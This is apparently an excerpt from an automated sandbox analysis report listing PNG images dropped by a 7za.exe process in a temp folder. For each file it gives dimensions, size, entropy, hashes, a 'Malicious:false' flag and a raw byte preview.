      Entropy (8bit):7.822995639147127
      Encrypted:false
      SSDEEP:
      MD5:A941136916F1010AD1D132703917D009
      SHA1:FA88E70722FE78313935A8CFFE7477EB3F58E1FA
      SHA-256:4707B9B59B6D20DB186FA278F90E5AA5AA2A627D132C9F4BE2CB1AEFAAD5A81E
      SHA-512:4957D9F2BB0E69C3E57927FD2F053A032FF7AC4332A5889D2FEB5AE231697367C2C9ED8F8AD430AF842CD5C3D58718DA6FCCA35ADC6108B3979FDE8C710E14A9
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...V.........Z.k.....pHYs.................sRGB.........gAMA......a....VIDATx..X.N#9....@d.@.......[4...&<..:|Aw..I.... a...`M..L..`.HL....sKv......i8.e.|}m.___W....B...H&....F...w4DBV@.a"..o.c"Q..w......M....!..b..:$..$u...........T.E.CJ......]^^.v..........R..O.8..[.^[[..+...p.n..a|...+...h...{....`aaa*.X|.....k....M.vqqAccc.....-.'...I.._.....8..9.w.7`,.;;;.:...........j...!..5.S.L....Kj.R..u{...M....vww#...s...(..!u||<t.@..........].P(d9..u....$.....l...b..H... u......+........a``.........D.\ ,7....9....7{T}..&.u,N.>.:.M.........p,....E...r....`.I.../.{zz.V......Q..-6e&..j....[j.&unn............`p-....0.occ.....<g...VB..[...........QA=/......~...y..S.._Hi..9dpB.,.`7.Q.S%.b.W..0..O.R411..M..........UrA..6[.C*[Z`.W%..:........x.:.."...(q.K.......2....H\P..f=iC<uuui.Sf.>n$133C.........^^1.R.F2.......7....-..-.Lt.F....p..'d[....(r....!U..,.:....s.W...f32f...@.zy.E.............bi....}.(WP.a.Y.W...,...OB..o.^..'y.....d.(..z&.5..O..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 314 x 268, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):12870
      Entropy (8bit):7.965343938478781
      Encrypted:false
      SSDEEP:
      MD5:68BDF2CE8E975380EDE9C60D944C4B3D
      SHA1:E73E745F2D946B3A125552EDA9538A67CFF1DBF7
      SHA-256:505A7259B8A7A2A0A67014BEDAA4610263A53A157C4A9392D6CDE465FF7699F4
      SHA-512:B5CAA77C0C02E688B4C532F366813C4A181588B6177982C93AA3281737EB336B0EAC97CB9E2C58853A592DDE2235547991A23043E8E5EACE1D49ED6523F5E8F0
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...:.........Taz.....pHYs.................sRGB.........gAMA......a...1.IDATx...|......9IB.p.P.EQ.(.......V.Z.O.5.O..-...j.......`.. <...W.a.h.DQ....."*...d..Cv...d&.n........._..;;.....{....A~...5.]^A~b.f..19....L......zb.f.......A..N...,j$.a....kN/r@.E.0..[t.F...|qw...........e."..cX.<........kX.<.x../....p....,..-}....,t.D......<2"\.8.R.Md..W.u.8J.?....d...n...*....-,t9..,..........G....."A.N....`W.a48F.+ ....".0.`......~.k$..1..0..._..<y&s.E.0YFd.."C.?y.T.el...a...<H.W.....:....4...wk...h.:...../a., ?/.8..R\..>.+]E...[tL..VKPX4+..}.!...$..........|.40f*",.+i%..I..x.....1Ya.).....|.`..j.C..4.2...........9.'..E.~X.....8.+S...%x:...._..N....T+.!.....v].X.Y|..f.T.r..../..$d....d.rB...L.".._8..9...cb..X.W.k.0r..P..!rM..Y...n.".9X.x...y......%....K.W.M.U...&..g...X....VP.-I.5..86......v...".......I....VEGmX.f.....B$.}.........1F.G_.i..qAlj.C+..`..3\nCI.&o`.c.P.$*.ZYj\...#@e.JNTW.Iq..F...c.....R.)....\.....\g......5W..mX..k......U\.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 235 x 201, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):5257
      Entropy (8bit):7.922282170616291
      Encrypted:false
      SSDEEP:
      MD5:1AC3EFF8BF99F709489A10A78F4A0866
      SHA1:0DA2B45C8C9E12410E6BC965DFBD1A5C06F361FF
      SHA-256:47343DD66BBFA9A30E439E98D91034FB49A56617503C7984CE5C7F026390196E
      SHA-512:CF8561F67F76BEF647EB6767F4FA50DE70479F0B74CAE0AAA46EA8B77FF8FB1D7577B66453ED97ADA6938AB3D059A9E6553DDF4CBE9C25408D971A6ED9F59ED9
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............n......pHYs.................sRGB.........gAMA......a.....IDATx....tT....o^.M&@.0.C....ZW.V.]...n.J<..=-.*..mW..n.#.....=.+.=.zZ...T.l-..C+......J OBH.....2!3.;s...9g.$...a........DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDd..P 577G.]$.SZ*++[@....`P....P.....f<.../..8\...O.~.,>..999..{{{..y..[......ZH.0....-.......?-.p........c[.P..a5A..Qu..{....|l<N......n.?..o.1...C)!...H#...-...b....U..uH0/Ro.Z.J.....^.C.V=.K......RicA.o..jTN........j.I\.f..`...........:..u...3../l.n........h-.RP.RqUh........T?.e`@)3FS....8<.a......L5in...d...S....|.V..Z..].VQ..\..J....2...O...aeH.#....u.O......>.~@u ...O..@T.<......'.*y..'.{.UUL....TV..U?...&/...U..aUA]..5..0.|.....z446aL.d.*,B^~...QVZ.s.M.5..1.a..Z........+.?x.,...7..7h._p.|..b.Yizt..Y.....B.........>...cV.U..........*.bw|?.m....{......hoKK.v.".....M......S..-..X[8.........u.5....^.....]E...E....vl~w.Z..Q^Z....d....>.x...8.J.x.....0L.Q.m..B;.....>..|P?=...
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 689 x 589, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):11791
      Entropy (8bit):7.769938935102314
      Encrypted:false
      SSDEEP:
      MD5:12B2889CBE1FD259E43A060615345D7B
      SHA1:8EE8262E2C51342CBCB4CA584DFB2A6FD865EBA9
      SHA-256:0F306E512391A249410B373392B16893F6DCDDE90FC2679D35924518BCD48292
      SHA-512:8AD5030B61E0EB8BA901847E6769A99545A6551B41291E4E33D506DA59C6E5CAF46885246D4DE9E88E4F9F90186278252465FA9087D1B99F7B249835E0862354
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......M.....&.-O..-.IDATx^.....gA.q..5..N.5j...F.#..ZT.TV.4.k......rE...0k\..C1...$2.@..(.n...a.......pV.Z.....7V...s:.>.{.}.9....y..'.F.s..=...............................................................................................................................................................................................................................................................................................................CE..:Rt.\.*:Q.....UM&.;.6.l.d...P..y..g...6..K..x../.>..._...A.....q4?.NL{zLNv..0.fm.w.....=...u.....>....../..pd...0B....g.-....(.A3..<R....hr....A<.z......x.8.....h.A...0".Q..l.n.......=..O..k....4.Q...(ixS.o.F.t..dz.7|.L...c7.....4.....q*u[....5.n.........y.......?.oN\.$..........0..MxS....sOG.o......@.ECuv45....~IU.NS81.9E....=....o8..M.oB.GT%5.q.........\..'>-..e.9.o..H.x.4...b.....HR...5l..l:X._......7.IJ....=..a.T......t..S..)R....I8.`.JR....X..Q.pD...9...j....F-@..;w..]x.......$5.hri....N.`......I
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 345 x 295, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):8493
      Entropy (8bit):7.904064636583338
      Encrypted:false
      SSDEEP:
      MD5:B7FD948C8936B10024E642A3862A26D7
      SHA1:EA27E18FFDA491D95A1596546C0575070FC29D21
      SHA-256:F1E2A8121767F18A539E4087D4C79A0505F0B5064ED012242E670A6F818987D8
      SHA-512:81BE3AEFCBBA9F5ADF25E05216070E92F81A119CA163482A8655A9328D8A62D81456181841C97E956A4A81EBC829B4E2059F31A1C50EEF9346D0828A0F00B34F
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...Y...'.......0j....pHYs.................sRGB.........gAMA......a... .IDATx....t..y..G.l.lK.F..x..$.....nbD.BoI...K.I..@oSh.H.-.@.!@N^n.\J..Bm...1.....2oMy.l..6.5.l#c.z.d[R..hF..v........9..].d[..g./".............................................................................................................Q&@......M..ab...Y.O.4i.....D..M.X...c.............g..o...O..(-.,R..2!..t....y.Wx"...........sI......%...}X.Mp..Cs.1A.h.'e(..v '..L.....![$\!...u&@....X.6.MR.W.k.&...!d...T.IF*Q......A.Up...-2T.6."A.....aj~X...4!@..j..b.b.o..\....0.....>....).#%x.x.G..}..d..<..1.l.n3..;B6d.i...M.)?.....B6`v...>._!.*...p5t....M..E......Rm..t8....M...]....7.j.......A......v..n...@f..w.-.Bv"v.R........MR...4..`..kv.T..A.......PJ.-!.U..&X+\..Be..]...B..}.k..O.X.W ..V.z)R%......B....N....B.p.b...dB.p.....b..[.!{..a...p...}..B..P.!.h..8...g.q.....Y.5..n..(...B(..5.....['....d~..[....C.,.+PR.....&3.E...-..C...[;::.w...VM..j.*...3?.(...-...G..)
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 345 x 295, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):6023
      Entropy (8bit):7.828666270266868
      Encrypted:false
      SSDEEP:
      MD5:B169E2CB396F142850FAFAC08BDC756B
      SHA1:6B8DAA5DFB9DB715A6B4FE143D8F1C8660CC0373
      SHA-256:74D7E73AB8A520DDE3C5CEDF43994CDF037CD0890E99D8B1B67E7E57C18B2000
      SHA-512:CDA89128640FA9128CA2A6321ACFE53F40C7A2A053F55121A09E5B7CB4B27B84311FEF29754D629AF9428117982460755BB1C6D6A375AC50874E58FF67C264D4
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...Y...'.......0j....pHYs.................sRGB.........gAMA......a.....IDATx.....T......>...."..j._.e$Z......bm..j.f.R .+.E.....+..F........ki..u..5Q.M"..E`.u...a.....C.L.L?...o.?...t.t.f...s...E............................................................................................................pDB..455U......n..>.<?`...Y_.H..../..1/5.....D........{s.7WVV.|m..B.]d.eR..2..&......O.*%Y.k.\.....R.c..)A...e...{s.Mp.sC..1..4.S...)7.S..L...".......hn.&@/p....Pm.MJoY!..."..C.FH.G.*9R.j.&......Z....$..o. ....L.&..S....H....v./.M.q='..G.Z.....D.#.s,T..F.....!.0.#....+.TX....:B.t...2...P..>.#z......s+...G..B."^......t.nJ.'B..&X.+.*..G&pk.....".....f~....*....5B.vA....Xg.m......r..@....V*V.x.Z...2D......s.u....^.\......[B6.V..`.p.......a....Y.$V..K.&.+..:..P#1U.!....'.Z.......e...+`..m.,..D...8\.[.!.w.^...p.".=A.8.....Y...x0....>|.b..X....X....C$[...Y....o..Bk..%..{..B.....Y.W..hU;#..3."du.....i.h.......N.k.....gn....\p.9..B.6.!.N.,..<..j..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 87 x 91, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):6992
      Entropy (8bit):7.948521468902655
      Encrypted:false
      SSDEEP:
      MD5:1AB2C56EEF6C72E1841751D0E7732FF1
      SHA1:6B9FA3A2BF634140C03ACB5CD8E7FCB77D6A0978
      SHA-256:7218E43A5B7444075FB358882DF391F352144F0B5889BD47AD953C9F7020096B
      SHA-512:6564DFC43578601E2FB1071E6DEE8E5479930C089798D0BFDB9A67A77BEC5A42BF9D8DE83D427C786E44D5D13D5C80A4A6C31E82A075D0771217F0BA63E7240D
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...W...[.............pHYs.................sRGB.........gAMA......a.....IDATx..]..T...==3.0.{ ..B.*....Y1k..T..B"FEtS.+FSq.v7+.U..n.HY.h.5nP..7..j..q...>Q@.!...........=..3.=............?.=.>..V,i..5... ..#.5V..Z.8.~#.....V.l..00.X..y.....&..#...]CE.1..@5.Y`,.,.<kh........c.:.m..'...Y]*.0..$.A+.X..t.../.N..Y2w......?..[..;.L........5....."k-....?....7z.u..!.6.7P.4.~....>]..[...o.P..-......<....b.u...+p}l3.b..Df..63.Q*:-...4.9..@>x.-|....lCd.wF....%T....m.1.Q......%.=..c.. p}.k.....k...h..a .5.H..M.6........e.E.r.s6?..J.v#_}-EfmEh...._Y..o.....K...i.,y.}..p.VpU/......h;...^.G.M.2k...<2.&.h.._.[..;.....z:.Ftc...........x.)........5....9.9.Fw..X.1.ED77..6......f.q...7.H...t.....8'm...aP..-........,..Q.RYG.2.;w.,.....Hc..z9.k.$....[w........;..e`..zi^e.B...z1.kz..O.E...^H=...[.8..r..G...9s........Z.k..O....[2.....[..d.lC...{r.."..C....r...Kuu.a....?~Wc.....H...[?k.o>..Q..+;7....']...?^u..a....>J....O..V. ........mj..%.|p.S
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 55 x 18, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1048
      Entropy (8bit):7.731699539941505
      Encrypted:false
      SSDEEP:
      MD5:2D1132B7CB8B92718928121B90E4AEB2
      SHA1:F9D376EAB2AB04D20B87F641168CD05BBDD903D4
      SHA-256:DE41BF944E7B38730351F43CD42607772F0AF4C496F74BB22CC8188272543A91
      SHA-512:1323E48F6E2568A9CC6113867B303DAC8AEAF2DD31634EAF81ACD18198963072FEEC197EC8C5A635FE33AF11AE1BF39B901D391DF55AFC4FDDF88C1557B6CA6C
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...7...........F.....pHYs.................sRGB.........gAMA......a.....IDATx..W.N.@......9....'...M@.I........<...p....u$.uO....@p@..8..x2v.i.......f."...iD........q.)V.........K..,.C.h.....[../..s...]..S.t:.l6...+Z.........c.@.j..%.z.p..........kC..+....!3F..v.... ...{S2........=.5,...I!..N6.q&v.k.......P.............M......N.....O.H..{.....Q5e.r!wm...L.oOC...v,......?B....j.{yy.t....v..e.Qqr...r.S....th~...[D5.=l7.c38...h.=<<.......J....O..a...A.?..x........?...dr....!...........nooI*.;[.N...#.P........H..;|..H...........g...d%....j~*..5W..?...H..].&q6...T........TP.*;.DPW9..'.W..........*6..[.(.....rw.<=N...MW.C)+..DJ8.*.1.. Ur.q.8w'..7.l"._..qH....\"R.......Z..........'....)...M.ej])k.. NM....O...2..2.HY!...O..PLw........YRbC...|.e...T....\85M..Ggcn@.u..h.~=....sl.f..{.......).....}rv".q2....O.........iY..WA...?1..H.J..:.9.8n.S.@C..J}..O.(|X......P.h^.R......T..@u..2......'>{..92.eA...V5!...$NE.~<.@g../.F......S.R...K#.I.7..#.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 210 x 130, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1666
      Entropy (8bit):7.688000688101414
      Encrypted:false
      SSDEEP:
      MD5:9317F902A1A6C30F7B7D2D6BE2002803
      SHA1:0EB579BCC8FFFBEBFC8E21DE3A470BD0EE8C0D7B
      SHA-256:196DA0C1548EB42D823CF27F62DD25BA79B4E70CB858BBA00BFDF23BE385626B
      SHA-512:0423C6AF3F949597A03F58B87CF5A3E8C963D07A169EF6364360F2D4D1E97CAF1B8F48BE2340A4990F58D5D1B22EFAFEAC5C675D3C328FE9120E0A799B63EC73
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............3.......sRGB.........gAMA......a.....pHYs..........+......IDATx^..Ol.e...W.Pn..'....$..&..M('...d. ..F....&M....!j{........b.5...A......7.W..8C.........~?...v(;?.w..y...!.X.'.W..@.....0@.....0@.....0@.....0@.....0@.....0@.....0@.....0@....O5...!|2:.....w..]};....u...;.:H.....t.1..!|v..h..u..b.J.jX.{/\._M......_~.o.;..0..?.<6..!......S....wB...*.Ke:..Q|..6....*....R... ....`.2...oR.j...'us.....n...P. .?....gE....:.tt........?o.<o....k.V5.H...O..;.....k......A...$..A...$..A...$..A...$..A...$..A...$..A...$..Ar@..O..K^[.Z.*..?.R.j.S..&....}}..........d*..|:.^...&n..L....m.. 9.r.'..Z*..w.?..y/...Zm.zG..P@Z...r%B$...+..A..T"H._..T. U.....{....M;...,..A...$..A...$..A*X.O..@UF.xF..v...d...F>N.i..Z..;.w@..R..!0....L.h...._.O....I^Q..T.C...G^h.D;...:......I.Q..T0.......&....UB.BjBj.RF.f.G..R.h...>dW&5....O..........W{'iB...c..(.Aj...C..5........v...k.=.P6....:.!j.J.!....'....W&n<p...gQSlS....9.v?..?.......;.w.E......~...k.;~d....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 204 x 149, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):4972
      Entropy (8bit):7.9345190044525555
      Encrypted:false
      SSDEEP:
      MD5:A43605B4AB97297A27AC68B3747E61FB
      SHA1:A9143208894C6A667CE121BD13F57F2F3BF53DA3
      SHA-256:677B6AE48B0A71E404D57534F943EF323C41E58212F55D81F96321664AAC440C
      SHA-512:66FEC12729C4B4045AC674274CB5CD15A9CF3453BC6759EE83EADBE52E27DBB7D9815EB3A36C263EED8E990861B424BE3D8CA25520A9FBFE179DD88F2F2CF9BD
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.....................bKGD..............pHYs..........+......tIME.....16~M].....IDATx..ml.W....)..q..Af.JY.].6B....V.$h..)/..U...W..$D....^hQ...4.7 .M%..7...^v....#."..hI6w1..I.1v.8.Q.t...g.3....D.0....</..)...\...'..y....G03....BC..........y=p...(^...-"`Hz...0f.C....s..|=...gM.e;....!Y.L\....7T.DH.........4.<..IsP.O}...7u.owS....NUp...f..=..o..9.M.p.j'`H.Q".. .O(....k6.V|M...|..P.k'.C2.&.p.....z.].u`...W....=...l8..HXv..........._.&....vI./.....s..tO(0.....+zo...........Y.%....mX...~....]...;~T.g!`H9?....3...=..}G..5~.+.....C...W}-.v..3.^....].AC..4..q..<...........(.....(...[..ZK.........]......O...={._..}.t...`............CR........Cyw..?..P. 4.x.....;z...M.c..].._..1../....}.. ...5/W..,..E.[w..6...C..Gx.Xh.e.......&-0... ..#1.F.E<.........^.l^.l.y..}X[.0.Plr...~.;.F.Y..4....Wx7m..0..*.#.]...&{..l.....{._.CS....%..Fy........6lZ..ft...!...L..\.Jk.p..4...1.......y.E.7..q..e.......69..{.03...=.2.....&...u....<.;.....7M?vB.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 210 x 130, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):2157
      Entropy (8bit):7.734738875271944
      Encrypted:false
      SSDEEP:
      MD5:FEDBAE40F618A1315DBCA54071708013
      SHA1:554B12FC2B3B1E09813DC2A8F112D68B1E3E0A65
      SHA-256:018E28F327C21D124BD38DC6C7D80BF8B3A1E61CDD533C31F57F8685F90CB0FB
      SHA-512:78F6D9CA1DD023172CD780230E96FFC50F32BF0A6109182D804EE255FFE03C6D5516C90037897BE92E26547336FA043A4F5A4A22BF3D55B4295F873E342157C9
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............3.......sRGB.........gAMA......a.....pHYs..........+......IDATx^..}hUu..._...?m..V....%...#...,."..`Z0#.R.!{.... dE&.Q.E.fIN.B.da.=.Qf..f....<....>.}..s{..r..=..q...{:z.........g..@.....0@.....0@.....0@.....0@.....0@.....0@.....0@.....0...!.........3.<.y.T.<..5.K..S.........o..V.R.T^.i.........U...i..]..d.;n.......!....g.w..d...n.....|.m.._.;t.[...-_../#_V.......o.<..Q;j...<..d)......$.@M...mk..}.^C.8.X?6Y.....F..Q<...>RM.....*.Y....M;.@..Hu.G.I.'.e..M..~./.\.J.......7<.12...<.i.. H..... H..... H..... H..... H..... H..... H..... H.....7{.].....0@.....0@.....0@....=.m...{.j?:w....u.~..x4O.......u^x..._'mw...'O;....m...z}..3.=..k[../.Z.2..7e..}.uw...+KSA.ku|).w...>.2k.4..p......J...>....s.9...1y...AJyf...........*.....9U..mo...jf..%.X.1MaU....Mg\C...G....h[....Z:..yK.~;..A.($..B.nM..S...o.J.~..{.P.......7)D..W... }......Rt..IB.E...G."......Z.,..../w|0.....p.t?'Ma.B..#. EBSj...s1...l.K....7..Z\.k.).w/../.O..U.. ..A..f
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 210 x 130, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1872
      Entropy (8bit):7.5630665797892265
      Encrypted:false
      SSDEEP:
      MD5:8BFF39AE83783CCACB7175347102549A
      SHA1:AA69E573803C07EBEECC502F2A6D3F0E07250D51
      SHA-256:9A940E08C97CDB82C181A98EE99E1C145AC96BA9061D25F9075DFAAB5727BD75
      SHA-512:65144E4ED0D6827D9F6053D26B3FB1BA1259E00C406C8A51275506E95AC6A4EC880B8969A32274C38299D7608018D70226362D8ED1C14ED9EE0805DA881A9E74
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............3.......sRGB.........gAMA......a.....pHYs..........+......IDATx^.._hVu..........P.B.V$dd^.I...o...Ya..R.......H.6...*....R.6R.D..0#/J.u..bB..y~O....g..s..=...<.s1...|...)......r./.A H....( H....( H....( H....( H....( H....( H....( H....( H....( H....( H....( H....( H....( H....( H....( H....( H....( H....( H....( H....( H.......Y........?..W`.].+..s...7.+..|.N.<.Y.......|.*/+s..*.;[7..I....a>H.>......_.u#G.p.....3._)...t......})G...G..d....g..i...nvM..R.L.i..O.#...n.K.|.V...kz.=_rnQ..(%A..........y.97kf...B.4....,{..*.AJ...Mu.7..R..GB...p..../e. !X.v7.:...l.....g]..#.<...M.j*'Mt3....jN.....2.A..I...3.;....=.q.-...x....e....o}.;*'.5........]m4.$.^\.z.4.."..@..W...._.Ojr.2.9....M...O.... ?z..GN.3zT&Kb....['.......o-..l....#...w...X#..+..hn...:..L.3.....h?t$zr'C.E.........{......M..-.o..".....}.f=!X]5-..+.j..'O...yC.A......7..-.L...s..........B:.R...wx.&}m.*..m......r...C..h...I'O}..l..'C.yg:..VJ.A*.u..?..F.:....8.4.N
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 601 x 312, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):16791
      Entropy (8bit):7.809469035258371
      Encrypted:false
      SSDEEP:
      MD5:B35DC0094C3BE494E21D07F697CEABBD
      SHA1:C701D0B2E57DE23E9D587EBC0A36A88FFAE482C3
      SHA-256:8784892D5459FD55D6D52664BEBE49C1873B2A7CEC0594F0760B0C85F7415CBA
      SHA-512:60D76B6833DBC0E80B8DED098E428A40B749C076E2F1294E1FA0DBDA2DEDAEBA5A42F8C6CA8DA55C7F472BA42F3ABE7AF60D766E7688B4635868BD0A5A68BC99
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...Y...8.....h..%....sRGB.......@.IDATx.......}......V.:... ..47..2...l....0.;!/&q.;.y/...$...I..<..a.-!.H.$6F...O.[HHH..kv......;.s....v....2............Z.....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@.@..D..[...H..7....cd..3G..P.>...l...C.......d".-..t...O...u...T./.L.N$..$.....%V....K...k.~..P~..(W. .\1.Y`..u....k.bLs.......f.i.......>..@`..V.*c..^.~.Q@...d......,..9y......~..,u.C...C.=,.]=..........~....H..+W.LT.`..+....j...w...z[.~j.k.n../..t:.';y.@....X..I...............L.r...Zu......o.M.....X..h...:..^.wK,....vJ.Sp... ..%....X.z.E.........E...f'... P5..pxa........kZ. ...7 .g._2...]{.r....T.j ...*`.R........FS0. ...X.b....S..-.C....%..........JQ.P..d....[.....4.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 365 x 322, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):17882
      Entropy (8bit):7.969002511350107
      Encrypted:false
      SSDEEP:
      MD5:A8C2CEF497F6AE28FA74CB35F887D96A
      SHA1:223C36AFF183A0ED42F84EC0C78E0E616B72798B
      SHA-256:8EBA03AD90339689152ADF8C4764B020ACCB641DB74058029E1D7E39D3CBA57F
      SHA-512:52FDB7E2B823827169E522BD786EFDB259CDA24E9DA25DDA37E5F53D0D6D9D1ADBD67C7614ADEABA28C37BADCF97F058BF9C9C76B4BB19AA9124AB5C4F7ACF9E
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...m...B.....:.......sRGB.......@.IDATx..}...U....e...dfB. ;D...YEH....O.Q...D..q.T@D@@T.}.....(.."bXD..H2.l3...L2{/u....'..Z..s.Tw.]..n.W...\.81..F....f .|D(p..8Q..o.:......s/A.....[F]./.....{..#.,.:..f$.._.PNG..."...FQ....~][Y..........&m.z.e......d.0.g.*.+..?B..c.;.P|]&...e...%#.;.zNL...Ju.LE].]B._WU.HQ..#`1....qs.@...w.^..x.x.&Q.*Eh.j............m...d...u.../.D.9..}k]u...k......0i..1.P$.m..w..K.,^l._.T..W..'.pb..C..#...K....}...M..nGW.e..# #.li..+.....w...V.....\!z..8.....g.....-........l#l.NQ.../..|.....&m;P.63"...,$.32f..r....!F /....3Y.....V..G;...0..".>mK...!....x.?..X}M...&.y..v.=F ..ligB.....v4..M..t2e......&m....4\"..8Y...dby......._..w...Sd.4......u......&$..)...=...*;....*]BM.%.l,...`..^..qR.S0\.....&+f,.y.0i..-.\....E.$......e..L.A....@U..-..@H+.e pC. ..-MWx^..Y......&+f,.y.0i..-.\....I.(..&+f,.i.0i..-W\....6....Bb.E.[...&m...%@.|..#1.2.&1l,...p..3P.:.B...g3.r-d.bWmu..(...#`..li..*WY4.......Ek......`.6.T..8......
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 51 x 51, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1280
      Entropy (8bit):7.795580636977354
      Encrypted:false
      SSDEEP:
      MD5:3A6A9DB81ECF4BEB82AEC672503E0A40
      SHA1:AA0B4EAE6903D3042475461A54106FFA42FBF897
      SHA-256:589161108992FF5DF9A16D216A426346904C4BE4F8518477ED37BFFBD8F0DC73
      SHA-512:3B2CFE771A3A5B1F494EEDD45EFF697A238839E5BD0DCA4D1D458250E14E429667C03A794C2FD7E425B2EFA335A4D8852EF1A2CB137283A8DB1677FD0DB0FDD9
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...3...3.....:.0*....sRGB.........IDATh..YMV.0....#G....".......N.]..G.J....' =........7 .RJ.o..ql.R.;?.{y..h....4....~..v..MT$.r$..RoS.....k.j.>.NH&a.tN.nOi....-.K.Z...1]$U......R..2..6.BCn..#}m.....':_...H.Aal275:..US%...R._..y.).lL.G..}.........-.-|.{.....u...W..&..V......l>j.[a....U.?.9..y.w...b..F.,.e...5.ls.B.*...9..y".......L..p.44T.f]..{w..ZA.!2._(.nfs$.0....~A[.U..f.O.sM..aQ.....2<O :..7...!.s.z...q..Dws?*.td.n....}.....r..7.U....v.{d...de3K.~...g.N3...}P7p..!.v;A.E*K..7..n........g*...C2.Ta..E......+xX.7.M.a./....L.2.....8,.T?..*.../....j.....m.m....B..}_.r...e..'8.N<..-Dq.T}L...,..V..Z].'8fF.W..G&...k.tW6..*.....j.IU}.l.:.~U.k.ga.tT.1aNp.q.o.2.....'...]..N...$....|.....C&......3]..@@..P.bFv..E}<1...<........xo..f.i.....!..kebdJJ1$M6..g..<.........w. .{..?..bN..$.c..Cy..G....i.b..L]y5...ab2.[r..<Q....&..(..?...v..e..U.._&....H..o.q....&.P..a.y.x..T.{..H?. ..E./.B..J@.....2,.B...n.b..~:....."t....Ud(.........f....;.<.*.L.x.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 51 x 51, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1383
      Entropy (8bit):7.814978428651143
      Encrypted:false
      SSDEEP:
      MD5:B21B27F19684A7B17D639FF6280A2B9D
      SHA1:9F497DD0F07B421E2AE7B27F2C3E83E6DDCFAE43
      SHA-256:A3806423C4552EB0B35E0E301F3E01F49DB83A4098A0EA94BF783FA075B74A68
      SHA-512:005BB365AF193B80338EAC37E8B99D0686F9573938C479B2572D65F23836B0826727D9239D7AFCB21A2690D98047E3C7C6482BA8FF68BB14BCCFD1F3780D91D0
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...3...3.....:.0*....sRGB........!IDATh..Z.v.F.......'....)a....Q.:..j. ...u.v."?....7p..~.X....$N.:G......;#k......-c..{...PZ.9.F.F...z.....o..O...R..{...S4Fpl.w6|..)D....~.P4....;.6.A..#|h#.R.a#...sy..-.jj...8...w.".4A)...I.V...y8y14K..@.U.;..5..]."J........_. .>.(.:.........X....Q..VU.J.H..;...-........`.Q.........Ff.|..jm....._e`......V..m...L7.........e^.6S..Y...r.i....@8......fN......#../..."b.C}b]....'.....~.(.=A..#2......!7.....(O=.G.._....;".k.(..y.a....|.)..#.t0..PDn.O..(>(R..3..2 ...T...Q.o..^..o~[0L.E..J......YZ-..=.......c....\....j._.6..5..)..wn%.\......j...a.=..UFO...;...)BM....Xh.!?*...iuT68..{.....8P.(..)KC.{..v.J!.m...a..Zw..~.?...n..~....6.84....+..._..t...Ex.....@..n..Z..V...n0|...q..D.u\....6.p...^.tT.6.t....>N..H...S_..!SX..k...g....c$......)..G...2..Q"..L..:..G:uXw.....O.EhOZ...*....X.n..5..^..vD._....`..L%.mt......<8J.H.....1T..j?H...U..JtT.4:.............@....h0...s# 4..;..3.B{!...0B8&}......c.v.J
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 601 x 317, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):50070
